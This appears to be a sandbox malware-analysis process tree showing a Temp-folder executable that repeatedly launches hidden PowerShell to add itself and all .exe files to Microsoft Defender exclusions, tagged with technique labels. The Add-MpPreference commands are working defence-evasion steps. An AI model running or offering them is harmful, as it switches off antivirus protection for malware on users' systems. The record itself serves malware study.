  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:4520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2068
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:2528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4572
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:2188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:3504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:776
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4296
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:1452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4704
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2220
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:1964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1436
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:4816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4580
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4724
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3252
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4796
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1848
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:1556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4880
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:2428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2252
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2328
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3920
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:2224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2136
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3216
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1516
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:1800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3672
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3624
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:2804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2304
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4476
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1144
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2528
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3632
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3980
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3408
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1496
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:4948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:5000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:3608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1624
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:1556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2452
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:4100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:3276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    PID:5116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4600
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  PID:3672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4920
- C:\Windows\System32\cmd.exe
